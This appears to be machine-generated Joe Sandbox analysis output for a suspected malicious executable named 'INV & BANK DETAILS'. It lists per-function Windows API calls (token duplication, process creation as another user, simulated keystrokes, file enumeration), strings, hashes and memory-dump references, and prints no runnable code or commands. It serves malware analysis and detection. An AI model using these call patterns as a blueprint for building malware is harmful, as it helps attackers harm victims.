                                • API String ID: 4104443479-0
                                • Opcode ID: da6cf0a6a6ede84ba6bd8e84e417c60c21e62b34c0bbeb7423007b417bd32b93
                                • Instruction ID: f795c94f21b42bfaa1f1d864c387b497e6b2772b6b59ffbe067e85bcfecebbdf
                                • Opcode Fuzzy Hash: da6cf0a6a6ede84ba6bd8e84e417c60c21e62b34c0bbeb7423007b417bd32b93
                                • Instruction Fuzzy Hash: 65316170600608EBEF509F12DA816AE7BF4FF45751F20C82AEC99CA611E738D590CB99
                                APIs
                                • ReadFile.KERNELBASE(00000000,?,00010000,?,00000000,?,?), ref: 00403962
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: FileRead
                                • String ID:
                                • API String ID: 2738559852-0
                                • Opcode ID: 1ad996cfe488015177727b18f2e4922818e6f84b1f02dafd4ea7d02e8d251226
                                • Instruction ID: 166f8584a356b396cff84430351b18548b9fac1e31d224f9c9bf96d02c5d03dd
                                • Opcode Fuzzy Hash: 1ad996cfe488015177727b18f2e4922818e6f84b1f02dafd4ea7d02e8d251226
                                • Instruction Fuzzy Hash: 42111CB1200B019FD320CF55C984F27BBF8AB44711F10892ED5AA96B80D7B4FA45CBA4
                                APIs
                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                • _memmove.LIBCMT ref: 0044C1F2
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: _malloc_memmove
                                • String ID:
                                • API String ID: 1183979061-0
                                • Opcode ID: 6174b5f4084f8fc72baa1d8dd7588fc34c2bfe1b2951eef2a7f89965291f557d
                                • Instruction ID: 60fa024ef6ba522ef03b0058c27b5a86e99fade8cb479355d4b2ad9ce4e818de
                                • Opcode Fuzzy Hash: 6174b5f4084f8fc72baa1d8dd7588fc34c2bfe1b2951eef2a7f89965291f557d
                                • Instruction Fuzzy Hash: 25017574504640AFD321EF59C841D67B7E9EF99704B14845EF9D687702C675FC02C7A4
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: __lock_file
                                • String ID:
                                • API String ID: 3031932315-0
                                • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                APIs
                                • __lock_file.LIBCMT ref: 004142F5
                                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: __getptd_noexit__lock_file
                                • String ID:
                                • API String ID: 2597487223-0
                                • Opcode ID: 9ac44007e71a67e96c9bd323172c2fd33b2afcf641493e6b5ffc56499b4cea67
                                • Instruction ID: 8e443c470cd329b51aa0b2c66eafbe77d500ce91655981cf057e69b52ab9faa9
                                • Opcode Fuzzy Hash: 9ac44007e71a67e96c9bd323172c2fd33b2afcf641493e6b5ffc56499b4cea67
                                • Instruction Fuzzy Hash: 34F0C230A00219EBCF11BFB188024DF7B71EF44754F01845BF4205A151C73C8AD1EB99
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: __fread_nolock
                                • String ID:
                                • API String ID: 2638373210-0
                                • Opcode ID: edb91a60a9196e9afb8971b982a6898244a9e52d7973f3fad70e56183420ffb1
                                • Instruction ID: 9e9a42c0c7b58ac35d14f3716b04d6bdbb365f426eb98045716108692e45ddfa
                                • Opcode Fuzzy Hash: edb91a60a9196e9afb8971b982a6898244a9e52d7973f3fad70e56183420ffb1
                                • Instruction Fuzzy Hash: 82F01CB16047045FDB35CA24D941BA3B7E89B4A350F00481EFAAA87342D6B6B845CA99
                                APIs
                                • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,?,00000001,?,00002000), ref: 0040E068
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: FilePointer
                                • String ID:
                                • API String ID: 973152223-0
                                • Opcode ID: 2f91a6d7a6c9d76080dcc848e35544f56f2dd8b1f8da7f0a505c2e04f45c5971
                                • Instruction ID: 8945df8720cd9eebd038067e403ceee2f4781b994f17f63e488f9437ca0746d3
                                • Opcode Fuzzy Hash: 2f91a6d7a6c9d76080dcc848e35544f56f2dd8b1f8da7f0a505c2e04f45c5971
                                • Instruction Fuzzy Hash: ACE01275600208BFC704DFA4DC45DAE77B9E748601F008668FD01D7340D671AD5087A5
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: __wfsopen
                                • String ID:
                                • API String ID: 197181222-0
                                • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                APIs
                                • Sleep.KERNELBASE(000001F4), ref: 03CD22F9
                                Memory Dump Source
                                • Source File: 00000000.00000002.1431688567.0000000003CD0000.00000040.00000020.00020000.00000000.sdmp, Offset: 03CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_3cd0000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Sleep
                                • String ID:
                                • API String ID: 3472027048-0
                                • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                • Instruction ID: c305c53f2da17c166ca1ce429acbdf52f2c449b735bb9a5a95694b988bd2b2bd
                                • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                • Instruction Fuzzy Hash: 64E0E67494010DDFDB00DFB8D54969D7BB4EF04301F1005A1FD01D2280D6309D508A72
                                APIs
                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                • GetKeyState.USER32(00000011), ref: 0047C92D
                                • GetKeyState.USER32(00000009), ref: 0047C936
                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                • GetKeyState.USER32(00000010), ref: 0047C953
                                • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                • _wcsncpy.LIBCMT ref: 0047CA29
                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                • SendMessageW.USER32 ref: 0047CA7F
                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                • ImageList_SetDragCursorImage.COMCTL32(00C33438,00000000,00000000,00000000), ref: 0047CB9B
                                • ImageList_BeginDrag.COMCTL32(00C33438,00000000,000000F8,000000F0), ref: 0047CBAC
                                • SetCapture.USER32(?), ref: 0047CBB6
                                • ClientToScreen.USER32(?,?), ref: 0047CC17
                                • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                • ReleaseCapture.USER32 ref: 0047CC3A
                                • GetCursorPos.USER32(?), ref: 0047CC72
                                • ScreenToClient.USER32(?,?), ref: 0047CC80
                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                • SendMessageW.USER32 ref: 0047CD12
                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                • SendMessageW.USER32 ref: 0047CD80
                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                • GetCursorPos.USER32(?), ref: 0047CDC8
                                • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                • GetParent.USER32(00000000), ref: 0047CDF7
                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                • SendMessageW.USER32 ref: 0047CE93
                                • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                • TrackPopupMenuEx.USER32(?,00000000,?,?,00A31B28,00000000,?,?,?,?), ref: 0047CF1C
                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                • SendMessageW.USER32 ref: 0047CF6B
                                • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                • TrackPopupMenuEx.USER32(?,00000080,?,?,00A31B28,00000000,?,?,?,?), ref: 0047CFE6
                                • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                • String ID: @GUI_DRAGID$F
                                • API String ID: 3100379633-4164748364
                                • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                APIs
                                • GetForegroundWindow.USER32 ref: 00434420
                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                • IsIconic.USER32(?), ref: 0043444F
                                • ShowWindow.USER32(?,00000009), ref: 0043445C
                                • SetForegroundWindow.USER32(?), ref: 0043446A
                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                • GetCurrentThreadId.KERNEL32 ref: 00434485
                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                • keybd_event.USER32(00000012,00000000), ref: 00434514
                                • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                • String ID: Shell_TrayWnd
                                • API String ID: 2889586943-2988720461
                                • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                APIs
                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                • CloseHandle.KERNEL32(?), ref: 004463A0
                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                • GetProcessWindowStation.USER32 ref: 004463D1
                                • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                • _wcslen.LIBCMT ref: 00446498
                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                • _wcsncpy.LIBCMT ref: 004464C0
                                • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                • CloseWindowStation.USER32(00000000), ref: 0044656C
                                • CloseDesktop.USER32(?), ref: 0044657A
                                • SetProcessWindowStation.USER32(?), ref: 00446588
                                • CloseHandle.KERNEL32(?), ref: 00446592
                                • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                • String ID: $@OH$default$winsta0
                                • API String ID: 3324942560-3791954436
                                • Opcode ID: 3399b8295c7c69479d02148f997ef1a2228b9a46e895cdd3e83dbd6c3360cb32
                                • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                • Opcode Fuzzy Hash: 3399b8295c7c69479d02148f997ef1a2228b9a46e895cdd3e83dbd6c3360cb32
                                • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                APIs
                                • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                • FindClose.KERNEL32(00000000), ref: 00478924
                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                • __swprintf.LIBCMT ref: 004789D3
                                • __swprintf.LIBCMT ref: 00478A1D
                                • __swprintf.LIBCMT ref: 00478A4B
                                • __swprintf.LIBCMT ref: 00478A79
                                  • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                  • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                • __swprintf.LIBCMT ref: 00478AA7
                                • __swprintf.LIBCMT ref: 00478AD5
                                • __swprintf.LIBCMT ref: 00478B03
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                • API String ID: 999945258-2428617273
                                • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                APIs
                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                • __wsplitpath.LIBCMT ref: 00403492
                                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                • _wcscpy.LIBCMT ref: 004034A7
                                • _wcscat.LIBCMT ref: 004034BC
                                • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                  • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                  • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                • _wcscpy.LIBCMT ref: 004035A0
                                • _wcslen.LIBCMT ref: 00403623
                                • _wcslen.LIBCMT ref: 0040367D
                                Strings
                                • _, xrefs: 0040371C
                                • Unterminated string, xrefs: 00428348
                                • Error opening the file, xrefs: 00428231
                                • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                • API String ID: 3393021363-188983378
                                • Opcode ID: 429202cf83013c27d1cff007541d99969aca51ac9dbfed04581a67616158d41a
                                • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                • Opcode Fuzzy Hash: 429202cf83013c27d1cff007541d99969aca51ac9dbfed04581a67616158d41a
                                • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                APIs
                                • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                • FindClose.KERNEL32(00000000), ref: 00431B20
                                • FindClose.KERNEL32(00000000), ref: 00431B34
                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
